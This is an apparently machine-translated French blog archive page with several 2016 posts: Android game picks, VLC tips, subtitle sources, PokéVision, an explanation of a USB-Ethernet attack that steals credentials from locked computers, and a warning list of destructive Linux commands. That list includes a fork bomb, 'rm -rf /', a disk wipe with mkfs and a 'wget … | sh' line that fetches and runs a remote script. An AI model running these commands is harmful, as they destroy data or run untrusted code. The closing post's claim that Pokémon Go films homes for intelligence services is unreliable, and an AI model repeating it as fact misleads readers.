Powered By Blogger

Rechercher sur ce blogue

vendredi 9 septembre 2016

Top 10 des meilleurs jeux HD Android, en 2016



Ici, nous faisons une liste des meilleurs Top 10 meilleurs HD Jeux Android, vous devez jouer en 2016. 
Tous ces jeux sont disponibles sur Google Play Store.
Top 10 Meilleurs HD Jeux Android 2016 | haute Graphics
1) Creed Pirates Assassin
Au numéro 1 sur notre liste de la liste des 10 meilleurs jeux HD Android, nous avons le bien connu, Creed Pirates Assassin. Comme vous vous attendez d'un jeu développé par Ubisoft, les valeurs de production sont élevés - il y a une certaine modélisation 3D d'experts ici, veiller à ce que les bateaux semblent réalistes même si les batailles navales sont tout sauf.
Les cut-scenes, tout simplement, avec des personnages de dessins animés statiques, portent aussi le charme et il y a des toiles de fond amoureusement conçu pour faire la bataille. Même quelques années plus tard, cela est encore l'un des plus beaux titres sur Android.TéléchargerQR CodeCreed Pirates AssassinDéveloppeur: Ubisoft EntertainmentPrix: gratuit +

   
LIRE 6 Meilleur Android gratuit Jeux multijoueurs Vous pouvez jouer avec vos amis2) Unkilled
Ceci est un autre grand jeu mobile. Si vous êtes un fan du jeu apocalypse zombie alors ce titre se réunira vous avez envie aussi. Le jeu en tant que grands graphiques si vous rappelez-vous qu'il est destiné à être joué sur un appareil mobile portable. Le gameplay est grande et le jeu vous tiendra accroché pendant une longue période. Ceci est une excellente façon de passer le temps et qui est la raison pour laquelle ce jeu est sur notre liste des 10 meilleurs jeux HD Android que vous devez télécharger.TéléchargerQR CodeUNKILLEDDéveloppeur: MADFINGER JeuxPrix: gratuit +

   
3) Morte Effect 2
Si vous êtes un fan de la série Dead Space, ainsi que DOOM alors vous devriez donner à ce jeu un essai. Ce jeu comporte des zombies que vous serez en train de tuer et de faire votre chemin à travers les différentes étapes qui obtiennent de plus en plus difficile que vous progressez dans le jeu.TéléchargerQR CodeEffet Dead 2Développeur: BadFly Interactive, a.s.Prix: gratuit +

   
4) Epic Citadel
Donc, ce n'est pas vraiment un jeu, mais si vous voulez voir ce que votre téléphone ou tablette est vraiment capable, alors il ne peut pas faire mieux que cela. Propulsé en utilisant l'Unreal Engine 3, Epic Citadel vous permet d'explorer la citadelle de Infinity Blade.
Il y a une cathédrale, des passages sinueux, un bazar en plein air. Il est extrêmement impressionnant comme une vitrine de ce que Android est capable et très amusant de simplement se promener pendant un certain temps.TéléchargerQR CodeEpic CitadelDéveloppeur: Epic Games, Inc.Prix: Gratuit

   
LIRE Top 35 Avantages Pour Enracinement Android Phone en 20165) Rayman Adventures
série Rayman est également un populaire et maintenant vous pouvez jouer le jeu sur votre appareil mobile ainsi. Ce genre de titres viennent à des plates-formes mobiles parce que vous avez toujours accès à votre téléphone. Ce jeu est génial si vous voulez tuer un certain temps.TéléchargerQR CodeRayman AdventuresDéveloppeur: Ubisoft EntertainmentPrix: gratuit +

 
6) Real Racing 3
# 1 Top App gratuite dans plus de 100 pays ** Real Racing 3 est la franchise primée qui établit une nouvelle norme pour les jeux de course mobiles - vous devez jouer pour le croire.
Real Racing 3 dispose d'une liste sans cesse croissante de pistes sous licence officielle avec 39 circuits en 17 endroits du monde réel, une grille de 43 voitures et plus de 140 voitures méticuleusement détaillées des meilleurs fabricants. De plus en temps réel multijoueur, Leaderboards sociaux, Time Trials, courses de nuit, et le temps innovant Shifted Multijoueur ™ (TSM) la technologie, ce qui vous permet de faire la course tout le monde, à tout moment, partout.TéléchargerQR CodeReal Racing 3Développeur: Electronic ArtsPrix: gratuit +

   
7) Trigger Morte 2
Ceci est un jeu de zombie populaire que vous pouvez jouer sur votre téléphone. jeux Zombie sont de plus en plus populaires ces jours comme vous pouvez le voir sur cette liste déjà.TéléchargerQR CodeTRIGGER DEAD 2Développeur: MADFINGER JeuxPrix: gratuit +

   
8) Le sang sauvage
Si vous êtes un vieux genre de personne de l'école alors ce jeu est pour vous. Adore les vieilles légendes comme le chevalier de la table ronde, alors vous devriez prendre ce jeu de fantaisie pour un spin. Comme d'autres jeux, ce jeu a de beaux graphiques. Ceci est l'un des meilleurs jeux HD Android dont vous avez besoin d'essayer. Le jeu nécessite ~ 2Go d'espace libre pour installer.TéléchargerQR Codesang sauvageDéveloppeur: GameloftPrix: $ 6.99 +

   
9) Walking Robots War
Oui, le nom est pas branché mais si vous aimez guerriers mech alors ce jeu est l'un pour vous d'essayer. Je me souviens que je jouais un jeu similaire à celui-ci le chemin du retour sur PC. Va à montrer comment avancé jeux mobiles sont devenus. Ceci est l'un des meilleurs jeux HD Android.
War Robots est un jeu multijoueur bourré d'action avec 6 vs 6 batailles de l'équipe en temps réel!TéléchargerQR CodeRobots de guerreDéveloppeur: Pixonic LLCPrix: gratuit +

   
10) Modern Combat 5: Blackout
Ceci est un autre jeu que vous devez prendre. Les commandes sont personnalisables ainsi vous pouvez les changer en fonction de ce qui se sent le mieux pour vous. Ce ne sera pas rivaliser avec PC ou console, mais vous serez surpris à quel point il est.TéléchargerQR CodeModern Combat 5: BlackoutDéveloppeur: GameloftPrix: gratuit +

   
Top 10 Meilleurs HD Jeux Android 2016 | haute Graphics
Click To Tweet
Voici notre liste des 10 meilleurs jeux Android HD, vous devriez avoir sur votre appareil. Si nous avons manqué quelques HD Jeux Android populaires nous le faire savoir.



Source.:

Comment Hacker Windows et OS X protégé par mots de passe, en 13 secondes




Un chercheur de sécurité nommé Rob Fuller a découvert une méthode d'attaque unique qui peut être utilisé pour voler des informations d'identification à partir d'un ordinateur verrouillé. Ce piraté œuvres dans Windows et Mac PC.
Un chercheur en sécurité a trouvé un moyen unique qui peut être utilisé pour déverrouiller ou de voler des informations d'identification à partir d'un ordinateur verrouillé (mais, connecté) et un autre dieu nouvelles en elle a travaillé sur Windows et Apple Mac OS X système de Microsoft.Un expert en sécurité Rob Fuller dans son blog démontré et expliqué comment exploiter un dispositif à base de SoC-USB pour la transformer en un titre-renifleur qui peut être utilisé même sur un ordinateur verrouillé ou un ordinateur portable.
Le code du firmware du dongle USB est modifiée par plus complète de telle sorte que quand il est branché à un adaptateur Ethernet, le dispositif plug-and-play USB installe et se sert de passerelle de réseau, serveur DNS, ou Web Proxy Auto-découverte Protocole (WPAD) serveur pour la machine de la victime.(Lire également: Désactiver Windows 10 Keylogger)
L'attaque est possible parce que dans presque tous les systèmes d'exploitation d'ordinateur installer automatiquement les périphériques USB Plug-and-Play même ordinateur est verrouillé.[Par exemple: lorsque vous vous connectez la souris USB avec votre ordinateur portable ou ordinateur, il se connecte automatiquement avant connexion],
"Même si un système est verrouillé, le dispositif [dongle] obtient encore installé," Fuller explique dans son blog.
"Maintenant, je crois qu'il ya des restrictions sur les types de périphériques sont autorisés à installer dans un état verrouillé sur les systèmes d'exploitation plus récents (Win10 / El Capitan), mais Ethernet / LAN est certainement sur la liste blanche."


Comment l'attaque fonctionne?
Vous devez vous demander pourquoi votre ordinateur partage automatiquement les informations d'identification de Windows avec un périphérique connecté?
Ceci est parce que Microsoft se comporte par défaut des services de résolution de nom de sa fenêtre, qui peut être abusé de voler l'authentification de vos informations d'identification.Responder est le logiciel qui modifie l'adaptateur USB Ethernet plug-and-play, à travers lequel le réseau peut être spoofé pour intercepter les informations d'identification hachées puis il est stocké dans une base de données SQLite.Maintenant, les informations d'identification hackées qui sont stockées dans la base de données SQLite nous collectées par l'outil d'exploitation du réseau et peuvent ensuite être facilement par brute forcée pour obtenir des mots de passe en texte clair.
Apparemment, tous les besoins de l'attaquant est l'accès physique à un ordinateur cible pour mener cette attaque, par l'acquisition de l'accès physique, il peut brancher l'adaptateur USB Ethernet nuisibles.Cependant, il dit que le temps moyen nécessaire pour une attaque réussie est de seulement 13 secondes.


 Source.:

Les 10 plus dangereuses commandes de Linux OS



 Vous ne devriez jamais exécuter sur votre machine:
Terminal Linux est l'un des programmes les plus puissants sous Linux OS. La ligne de commande sous Linux OS est très productif, utile et intéressant, cependant, il peut parfois être très dangereux, surtout lorsqu'ils traitent racine de l'utilisateur ou de l'utilisateur qui peut prendre la plupart de leurs privilèges, sudo.
Vous devez savoir exactement ce que vous faites. Cet article a été créé pour les utilisateurs de Linux simplement signaler quelques-unes des commandes du terminal, que chaque utilisateur Linux devrait réfléchir à deux fois avant de les exécuter.
Si vous ne savez pas sur Linux et que vous voulez apprendre Linux en ligne lire ce post.LIRE Suivre 10 chaînes YouTube pour apprendre Linux en ligne
Lire la suite attentivement et connaître ces commandes dangereuses linux. Assurez-vous de ne jamais exécuter ces commandes dangereuses Linux dans votre machine Linux.
1. rm -rf
La commande rm -rf / supprime tout ce qu'il peut possible, y compris les fichiers sur votre disque dur et les fichiers sur des périphériques de supports amovibles connectés. Cette commande est plus compréhensible si elle est décomposée:
2 .: () {: |: &};:
: () {: |: &} ;: Également connu sous le nom Fork Bomb est une attaque par déni de service contre un système Linux. : () {: |: &} ;: Est une fonction bash. Une fois exécuté, il se répète plusieurs fois jusqu'à ce que le système se bloque.
Vous ne pouvez vous en débarrasser en redémarrant votre système. Soyez donc prudent lors de l'exécution de cette commande sur votre shell Linux.Commandes Fork
Commandes Fork
Source: Dake sur Wikimedia CommonsLIRE Comment faire pour convertir un chargeur USB dans un ordinateur Linux
3. command> / dev / sda
La commande ci-dessus écrit la sortie de 'commande sur le bloc / dev / sda. La commande ci-dessus écrit les données brutes et tous les fichiers sur le bloc sera remplacé par les données brutes, entraînant la perte totale des données dans le bloc.
4. répertoire mv / dev / null
/ Dev / null est un autre endroit spécial - déplacer quelque chose à / dev / null est la même chose que de le détruire. Pensez à / dev / null comme un trou noir. Essentiellement, mv ~ / dev / null envoie tous vos fichiers personnels dans un trou noir.LIRE Top 10 Meilleur Kali Linux Tutoriels de sécurité pour les débutants
5. http wget: // malicious_source -O | sh
La ligne ci-dessus télécharge un script à partir du Web et l'envoie à sh, qui exécute le contenu du script. Cela peut être dangereux si vous n'êtes pas sûr de ce que le script est ou si vous ne faites pas confiance sa source - ne pas exécuter des scripts non fiables.
6. mkfs.ext3 / dev / sda
La commande ci-dessus va formater le bloc 'sda' et vous serait sûrement savoir que, après l'exécution de la commande ci-dessus votre Block (Hard Disk Drive) serait nouvelle, BRAND NEW! Sans les données, en laissant votre système dans l'étape irrécupérables.LIRE Comment faire pour exécuter Windows 98 ou Linux entièrement dans votre navigateur Chrome
7.> File
La commande ci-dessus est utilisée pour libérer le contenu du fichier. Si la commande ci-dessus est exécutée avec une erreur de frappe ou de l'ignorance comme "> xt.conf" va écrire le fichier de configuration ou tout autre système ou d'un fichier de configuration.
8. ^ foo ^ bar
Cette commande est utilisée pour modifier la commande d'exécution précédente, sans la nécessité de retaper à nouveau l'ensemble de la commande. Mais cela peut vraiment être gênant si vous ne l'avez pas pris le risque de bien vérifier le changement de commande d'origine en utilisant ^ foo ^ commande bar.LIRE Suivre 10 chaînes YouTube pour apprendre Linux en ligne


10. Décompression Bombe
Vous avez reçu un fichier compressé et vous êtes invité à extraire ce fichier qui semble être de très petite taille, mais peut-être un peu KB. En fait, ce petit fichier compressé de taille contient des données très fortement compressées.
Une fois le fichier décompressé, des centaines de Go de données est extrait qui peut remplir votre disque dur pour faire baisser les performances de votre système. Pour éviter cette situation, rappelez-vous toujours d'accepter des données provenant de sources dignes de confiance.10 Most Dangerous Linux OS Commandes Vous ne devriez jamais exécuter sur votre machine

LIRE Top 10 Meilleur Hacking gratuit Outils 2016 pour Windows et Linux


Source.:

VLC : Top 20 Meilleurs astuces cachées que vous ne connaissez pas



VLC est l'un de nos lecteurs multimédias préférés (et aussi le vôtre). Lecteur multimédia VLC est l'un des meilleurs lecteur multimédia gratuit pour Windows PC. Il est livré avec 100s de fonctionnalités. Dans ce post, nous recueillons des trucs cachés et des conseils pour VLC media player. Vous pouvez faire beaucoup plus de choses avec le lecteur VLC comme jouer la vidéo Youtube, enregistrer des vidéos, prendre des instantanés et beaucoup plus. Lire la suite et savoir ces trucs secrets VLC.1. Convertir des vidéos en utilisant VLC
Beaucoup de VLC lecteurs multimédia utilisateurs ne savent pas à propos de cette astuces. VLC peut changer et convertir les vidéos dans de nombreux formats. Donc, vous n'avez pas besoin de télécharger un logiciel pour convertir Videos.Step 1: Open media player VLC et cliquez sur "Media" qui se trouve à
Étape 1: Ouvrez VLC media player et cliquez sur "Media" qui se trouve au coin supérieur droit. Maintenant Sélectionnez Convertir / Enregistrer. Ou Sinon, vous pouvez simplement appuyer sur "CTRL + R".Étape 2: Maintenant, une fenêtre apparaîtra comme une image ci-dessous, cliquez sur Ajouter et sélectionnez le fichier que vous voulez convertir, et cliquez sur Convertir / enregistrer.Convertir des vidéos en utilisant VLC
Convertir des vidéos en utilisant VLC
Étape 3: Sélectionnez ensuite le type de fichier que vous voulez convertir. Vous pouvez même modifier l'encodage vidéo. Voilà, ce qui est de savoir comment vous pouvez convertir une vidéoConvertir des vidéos en utilisant VLC
Convertir des vidéos en utilisant VLC
Voilà, ce qui est de savoir comment vous pouvez convertir la vidéo avec VLC Media Player.2. Visionnez les vidéos Youtube dans VLC:
Oui, vous avez bien lu, vous pouvez directement regarder toute la vidéo youtube lecteur VLC Media. Avant d'essayer cette astuce dans votre PC, assurez-vous d'avoir une bonne connexion Internet. Vous pouvez également vous débarrasser des perturbations indésirables causés dans les vidéos Youtube si vous regardez les vidéos dans VLC.
Étape 1: Ouvrez VLC media player et cliquez sur "Media" pour sélectionner "Ouvrir un flux réseau". CTRL + N est le raccourci pour effectuer cette tâche.
Étape 2: Ouvrez Youtube et rendez-vous sur votre Vidéo favorite, Copiez l'URL de la vidéo youtube.
Étape 3: Une fois que vous avez copié l'URL simplement coller là où il est dit Saisissez l'URL du réseau et cliquez sur Lecture.
Vous verrez que la vidéo est en streaming dans VLC Smoothly.3. Sync Audio dans VLC
Si Audio de votre vidéo ne se synchronise pas avec le flux vidéo puis avec une petite astuce que vous pouvez résoudre ce problème dans VLC media player. Vous pouvez même appliquer des effets à vos fichiers audio et vidéo, voyons comment:
Étape 1: Ouvrez VLC media player, cliquez sur Outils> Effets et filtres.
Étape 2: Cliquez sur Effet Audio si vous souhaitez ajouter des effets si vous jouez audio ou Cliquez sur l'effet de la vidéo pour ajouter des effets dans un fichier vidéo.
Étape 3: Maintenant Jouez et apporter des modifications pour ajouter des effets qui auront lieu en direct.Effets audio dans vlc
Effets audio dans vlc
Vous pouvez faire des changements dans la forme de luminosité, la teinte, etc. D'autres onglets comme la synchronisation est là pour ajouter des effets aussi.4. Prendre un instantané dans VLC
Plusieurs fois, en regardant un film ou une vidéo aléatoire que nous souhaitons prendre un instantané de celui-ci, mais il est trop de temps pour appuyer sur le bouton Imprimer de l'écran, puis la peinture ouverte et tout ça Ennuyeux.
Heureusement, VLC est livré avec la fonction de snapshot construire dans. Tout ce que vous devez faire est un clic droit sur la vidéo en cours de lecture, passez votre souris sur l'option de la vidéo (dans le menu contextuel) et sélectionnez Prendre un instantané.Prendre un instantané dans VLC
Prendre un instantané dans VLC
Il est aussi facile que cela, mais est très pratique à la fois.5. Utilisez la vidéo comme papier peint de bureau utilisant VLC
VLC est le lecteur multimédia Seul qui peut le faire pour vous. Vous pouvez remplacer votre fond d'écran avec une vidéo en utilisant rien d'autre que VLC media player.
Pour ce faire, sélectionnez une vidéo et commencer à jouer avec VLC. Faites un clic droit sur l'écran, sélectionnez Vidéo, puis sélectionnez Définir comme fond d'écran.vidéo comme fond d'écran dans vlc
vidéo comme fond d'écran dans vlc6. Enregistrement direct de Webcam
Vous pouvez enregistrer votre session de conversation vidéo facilement en utilisant VLC.1. Accédez aux médias - Ouvrir un périphérique de capture.2. Sur l'écran de capture de l'appareil, vous pouvez sélectionner le périphérique vidéo et aussi le périphérique audio comme le microphone du système.
3. Vous pouvez également configurer les options dans les paramètres Configurer. Finetune votre capture avec la luminosité, le contraste, la teinte, la saturation (et autres) des contrôles.4. Descendez et descendre sur le bouton Lecture pour ouvrir la boîte de dialogue Convertir où vous pouvez sélectionner le fichier de destination, cliquez sur le bouton Parcourir pour sélectionner le fichier vidéo emplacement, le nom et le format.Enregistrement Webcam directement dans VLC
Enregistrement Webcam directement dans VLC7. Ecouter Radio en ligne
VLC comprend des centaines de stations de radio Shoutcast. Vous avez juste besoin de lui permettre par le biais des médias >>> Services de découverte >>> Shoutcast annonces radio. Maintenant, ouvrez la liste de lecture et de naviguer à travers les stations.Souscrivez Podcats dans VLC
Souscrivez Podcats dans VLC8. Lecture de fichiers Rar
Lecture des médias contenus dans les fichiers Archive Si vous avez un fichier ZIP ou RAR qui contient un fichier multimédia, vous pouvez réellement les jouer au sein de VLC sans les extraire. Il suffit de les ouvrir avec VLC et il va jouer tous les fichiers contenus dans. Si le fichier est divisé en morceaux, il suffit d'ouvrir la première partie de l'archive dans VLC, ce que tous les fichiers sont dans le même endroit. Ceci est un bon conseil quand vous ne voulez pas perdre de l'espace de décompression de la vidéo.
Savez-vous VLC peut lire des vidéos zippées à l'intérieur des fichiers RAR? Ils jouent comme des fichiers vidéo normaux et vous pouvez même utiliser la barre de recherche. Si le fichier RAR est divisé en plusieurs fichiers, pas de problème. Il suffit de charger la première partie (.part001.rar) et il sera automatiquement prendre le reste des parties et de jouer le fichier entier.9. Tous les Podcasts
VLC peut être utilisé pour diffuser des podcasts, de sorte que vous n'avez pas besoin de logiciel supplémentaire si vous souhaitez écouter des podcasts sur votre PC.Souscrire Podcasts dans VLC
Souscrire Podcasts dans VLC

    
Il suffit de cliquer sur le menu Affichage dans VLC et sélectionnez Playlist.
    
Passez la souris sur Podcasts dans la barre latérale, cliquez sur le bouton + et coller l'adresse du flux d'un balado dans la boîte.
    
Vous pouvez ensuite diffuser les épisodes de podcast à partir de VLC.
10. Télécharger et Ajouter un fichier sous-titres
Si une vidéo vous ne vient pas avec des sous-titres, vous pouvez ajouter votre propre en trouvant un fichier de sous-titres SRT pour la vidéo et l'ajouter. Pour ajouter le sous-titre, jouer votre vidéo et aller à Subtitle sur la barre de menu et cliquez sur Ajouter fichier des sous-titres. Si vous voulez VLC pour jouer automatiquement, placez le fichier SRT dans le même dossier que la vidéo et assurez-vous qu'il utilise le même nom de fichier que le fichier vidéo.Ajouter des sous-titres dans VLC media player
Ajouter des sous-titres dans VLC media playerLIRE Comment ajouter Sous-titres Fichier Movies dans VLC Media PlayerLIRE Télécharger Subtitle bon pour vos films de deux façons11. Ruisseau Torrent directement à VLC Media Player
Regarder des films torrent sans téléchargement, oui il est vrai. Tout ce que vous devez télécharger un Ace Player (HD) VLC sur votre ordinateur.
Pour plus regarder cette vidéo et de savoir comment vous pouvez écouter des films torrent sur votre PC en utilisant VLC media player.Ace Player HD
Ace Player HD12. Regarder des films en 3D sur PC avec VLC Media PlayerComment regarder des films en 3D sur PC avec VLC Media Player
Comment regarder des films en 3D sur PC avec VLC Media Player

    
La première étape est exécutée film en 3D dans votre lecteur multimédia VLC. (Assurez-vous que le film que vous avez joué doit être SBS (Side-By-Side) de film en 3D).
    
Après cela, cliquez sur Outils, puis sélectionnez l'option Effets et filtres à partir du menu déroulant.
    
Maintenant, cliquez sur l'onglet Effets vidéo et dans cette section, cliquez sur l'onglet Avancé.
    
Dans l'onglet Avancé, mettez une coche sur l'option 3D anaglyphe.
    
Maintenant, vous êtes prêt à pour regarder des films en 3D dans l'ordinateur. Maintenant, il suffit de mettre vos lunettes rouge / cyan 3D et profiter de votre film 3D.
LIRE Comment regarder des films en 3D sur PC avec VLC Media PlayerFiche 13. Actuellement Jouer Video / Audio
Si vous souhaitez enregistrer et capturer un extrait d'une vidéo que vous jouez, VLC dispose d'une option pour le faire. Pour activer cette fonction, dans la barre de menu, cliquez sur Affichage> Contrôles avancés. Boutons supplémentaires apparaîtront sur l'application. Pendant la lecture d'un fichier multimédia, cliquez sur le bouton d'enregistrement pour commencer l'enregistrement. Appuyez à nouveau pour arrêter. Les enregistrements seront enregistrés dans le dossier Vidéos des vidéos tandis que l'audio sera à votre dossier Musique.
Pendant la lecture d'un fichier multimédia, cliquez droit et sélectionnez bouton Enregistrer pour commencer l'enregistrement. Appuyez à nouveau pour arrêter. Les enregistrements seront enregistrés dans le dossier Vidéos des vidéos tandis que l'audio sera à votre dossier Musique.Enregistrement vidéo dans VLC
Enregistrement vidéo dans VLC14. Débloquer Invisible Jigsaw Puzzle Game dans VLC
Essayez cette astuce dans Vlc Media Player et jouer le jeu caché dans votre PC.Débloquez Invisible Jigsaw Puzzle Game dans VLC
Débloquez Invisible Jigsaw Puzzle Game dans VLC
Étape 1: Ouvrez votre lecteur VLC app. Ne vous embêtez pas si vous jouez la vidéo ou non. Dans le menu principal, cliquez sur le bouton Paramètres étendus au bas de l'écran.
Étape 2: Maintenant, sélectionnez l'onglet "Video Effects" en haut de l'écran et sélectionnez l'onglet "Géométrie" sous cela.
Étape 3: Assurez-vous de cocher sur la case à côté de l'option "Puzzle Game". Ensuite, vous pouvez utiliser les lignes et les champs de colonnes pour sélectionner le nombre de pièces de puzzle, si vous voulez voir dans votre puzzle vidéo interactive. Quand tout est fait, il suffit de cliquer sur le bouton "fermer" au bas de cette fenêtre.
Étape 4: Redémarrage VLC & Jouer la vidéo:Maintenant, fermez complètement le VLC afin que les changements prennent effet. Maintenant, il suffit d'ouvrir toute vidéo dans VLC et vous verrez votre jeu de puzzle interactif.
Pour plus regarder cette vidéo.15. Jouer la vidéo En caractères ASCII
Pour un peu de plaisir, VLC vous permet d'afficher une vidéo tout en caractères ASCII.

    
Pour activer cette fonction amusante, allez dans Outils> Préférences et cliquez sur la vidéo.
    
Sous la zone de liste déroulante Sortie, choisissez la sortie de l'art vidéo couleur ASCII.
    
Votre vidéo sera désormais affiché entièrement en ASCII. Maintenant, essayez de regarder «The Matrix» comme celui-ci.
Play Video En caractères ASCII
Play Video En caractères ASCII16. Contrôle VLC depuis Android Phone
Contrôle VLC sur Android mobile
Transformez votre mobile en télécommande VLC et les films de contrôle en cours d'exécution depuis votre mobile Android. Si vous regardez des films avec votre famille et les amis, c'est donc le meilleur truc pour les scènes saut adultes dans les films sans toucher votre PC.
Télécharger l'application Remote unifiée dans votre téléphone Android pour contrôler VLC Media du téléphone.TéléchargerQR CodeUnified à distanceDéveloppeur: Unified IntentionsPrix: Gratuit

    
Unified Capture d'écran Remote ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified à distance ScreenshotUnified
Pour en savoir plus lire ce post.LIRE Comment contrôler à distance VLC Media Player à partir de votre Android17. VLC Inception Trick
Vous vous demandez ce que sa création ici? Eh bien, VLC Media Player peut prendre capture d'écran de votre écran actuel et continuer à prendre des captures d'écran en taille relativement plus petite et de mettre sur son panneau d'affichage qui fournira l'effet de votre création.VLC Inception Trick
VLC Inception Trick
Étapes à suivre pour effectuer cette astuce:

    
Ouvrez VLC Media Player Maintenant,
    
Appuyez sur Ctrl + N "écran: //" Type (sans les guillemets) dans la fenêtre ouverte
    
Cliquez sur Play pour voir cette création astuce VLC.
18. Double ou ralentir la vitesse de lecture
Cette fonction est très utile lorsque vous regardez un fichier multimédia principalement pour le contenu, tels que les podcasts, des livres audio, des conférences enregistrées, etc. Pour commencer, appuyez sur le bouton '+' du clavier pour avancer rapidement par 0,1x pour chaque presse. Pour ralentir, appuyez sur '-' touche du clavier.19. Extensions et Plugins
Tout comme Firefox, vous pouvez étendre la fonctionnalité et l'apparence de votre lecteur VLC. Il existe une variété d'extensions et skins disponibles sur le site VideoLAN. Jetez un oeil et voir ce qui vous plaît. Certaines des extensions vous permettent de récupérer automatiquement les sous-titres, informations sur les acteurs, ainsi que les paroles de chansons, entre autres choses. Skins, d'autre part, vous permettent de modifier l'apparence de votre lecteur multimédia et il y a beaucoup de disponibles qui sont sûrs d'adapter à votre goût.VLC Skins
VLC SkinsVLC Skins
VLC SkinsTélécharger VLC SkinsTélécharger Extensions VLC20.VLC Media Player Raccourcis clavier
VLC a intégré des raccourcis. Il y a des gens qui sont plus habitués à l'aide du clavier que la souris de leur ordinateur de bureau ou ordinateur portable et VLC Media Player a pris cela en considération. Voici les raccourcis clavier dans VLC Media Player.

    
F pour Fullscreen
    
barre d'espace pour jouer ou Pause
    
+ De jouer le multimédia plus rapide.
    
S pour Stop.
    
Ctrl + Q pour quitter.
    
Ctrl + touche fléchée pour rendre le volume plus élevé.
    
Ctrl + Bas touche flèche pour baisser le volume.
    
m pour couper le fichier multimédia.
    
Maj + touche flèche droite pour sauter vers l'avant.
    
Maj + Flèche gauche pour sauter vers l'arrière.
    
Ctrl + T et entrez le temps que vous voulez que la vidéo à sauter dans.
J'espère que ces 10 VLC media player astuces vous aideront à en apprendre davantage sur VLC media player.Top 20 Meilleurs VLC Media Player astuces cachées que vous ne connaissez pas
Source.:

VLC: Télécharger sous-titres pour vos films de deux façons




1. Télécharger Sublight pour Windows PC
Sublight est l'un des meilleurs moyens pour le meilleur trouver et télécharger des films sous-titres. Dans le logiciel Sublight il vous suffit de glisser-déposer vos films dans ce logiciel.
Sublight trouver automatiquement des sous-titres appropriés pour votre film. Cliquez sur le bouton de téléchargement et votre sous-titre est prêt à jouer.
Télécharger Sublight
télécharger des sous-titres pour les films de Sublight


2. Trouver manuellement des sous-titres pour vos films
Pour trouver des sous-titres pour votre film, vous pouvez utiliser les sites Web de sous-titres. Mais ceci est un travail manuel. Ci-dessous j'écris quelques sites majeurs pour trouver et télécharger des sous-titres.
http://subscene.com/
http://www.opensubtitles.org/
http://www.podnapisi.net/



Source.:

jeudi 8 septembre 2016

PokéVision, l’application qui rend Pokémon Go presque trop facile

Marre de louper les Pokémon les plus communs ? Envie de muscler votre jeu dans Pokémon Go ? Ne cherchez plus, vous êtes au bon endroit. Enfin, pas tout à fait, mais sachez que seules quelques secondes vous séparent de ce service révolutionnaire qui devrait grandement vous faciliter la tâche !
Le service en question, PokéVision, concrétise très certainement le rêve de n’importe quel joueur de Pokémon Go, quitte peut-être même à être qualifié d’outil de triche. Il faut dire que ce dernier vous mâche le travail : accessible au bout de ce lien, il va, après vous avoir géolocaliser, se charger de scanner la zone où vous vous trouver pour vous lister en temps réel les Pokémon se trouvant à proximité, et pour combien de temps. De quoi éviter d’enchaîner les kilomètres pour collecter des Rattatas et Roucools – même si ces derniers sont sacrément utiles pour grimper de niveau sans trop se compliquer la vie -.
Et puisque PokéVision est fiable à 100% – ses données sont directement reprises des serveurs de Niantic, le développeur de Pokémon Go -, vous n’avez plus aucune raison de ne pas mettre le site dans vos favoris. Et de (re)partir à la chasse ?
Dommage, le temps de quelques heures, on a également pu découvrir une application Android baptisée PokeNotify qui vous envoyait une notification dès qu’un Pokémon était près de vous. Mais puisqu’elle violait les conditions d’utilisation du jeu, elle n’a évidemment pas tardé… à disparaître tel un Pokémon vicieux. Triste.


Source.:

Ne jouez pas à Pokémon-Go




Voici quelques faits curieux sur le jeu Pokémon Go — et ce ne sont pas des ruses afin d’augmenter son niveau de jeu mais des détails sur le fonctionnement du projet. Détails qui peut-être réduiront à néant votre envie de vous lancer à la poursuite des Pokémon, ou de jouer en général.
Le projet Pokémon Go a été créé conjointement par The Pokémon Company, Nintendo et Niantic, ancienne filiale de Google. Niantic a été fondé par John Hanke, également fondateur de la compagnie Keyhole, Inc. spécialisée dans la création de cartes géospatiales. La compagnie a été financée par In-Q-Tel, un fonds américain de capital-investissement mis en place par la CIA en 1999.
A l’époque, plusieurs tâches ont été accomplies:
— la cartographie de la planète régulièrement mise à jour, y compris les autoroutes et tous les grands objets de l’infrastructure urbaine en général,
— des robots-véhicules ont mis leurs nez dans tous les coins du monde et ont cartographié des villes entières, des rues…
Un seul problème demeurait: comment pénétrer les maisons des citoyens, les sous-sols, les casernes et ainsi de suite? Et voilà que Niantic lance un jeu génial et viral basé sur le principe de la réalité augmentée. Une fois qu’il l’a installé et qu’il a lui autorisé l’accès à sa caméra, son microphone, son gyroscope, son GPS et tous ses appareils connectés, le smartphone de l’utilisateur se met à vibrer et signale que plusieurs Pokémon se trouvent à proximité.
Que se passe-t-il ensuite? L’application vous félicite pour votre premier succès parce qu’elle sait comment il est important pour le joueur d’être encouragé. Puis, elle requiert que vous filmiez vos premiers Pokémon captés de tous les angles — et obtient donc les photos de votre appartement en détail, y compris les coordonnées et l’angle d’inclinaison du smartphone.
Félicitations! Il semble que vous venez de filmer votre appartement, les services secrets vous seront certainement reconnaissants…
A propos, les règles d’utilisation qu’il faut accepter pour installer le jeu recèlent d’informations intéressantes. Ainsi, Niantic vous informe en ces termes officiels:
« Nous coopérons avec le gouvernement, les autorités compétentes ou des parties privées pour appliquer et respecter la loi. Nous pouvons divulguer toute information vous concernant (ou votre enfant autorisé) en notre possession ou sous notre contrôle au gouvernement, aux autorités compétentes ou aux parties privées dans le cas où, à notre seule discrétion, nous le penserions nécessaire ou approprié ».
Les développeurs précisent à quelles fins ils peuvent le faire: « (a) pour répondre aux réclamations et à toute procédure juridique (y compris des citations à comparaître); (b) pour protéger notre propriété, nos droits et notre sécurité et la propriété, les droits, et la sécurité d’un tiers ou du public en général; et (c) pour identifier et arrêter toute activité que nous considérerions illégale, contraire à l’éthique, ou passible d’actions en justice ».
Mais qui lit les règles de l’utilisation? On appuie sur « J’accepte » et on se dépêche de lancer le jeu.
Pourtant, les règles s’avèrent être une lecture bien excitante. Elles signalent par exemple que les servers de Pokémon Go enregistrent automatiquement certaines informations sur la façon dont une personne utilise ses services et s’en sert pour administrer ces services et analyser (petit détail: ils peuvent recourir à des tiers pour effectuer cette analyse).
Et cerise sur le gâteau:
« Les informations que nous collectons auprès de nos utilisateurs, y compris les données à caractère personnel, sont considérées comme un actif de l’entreprise ».
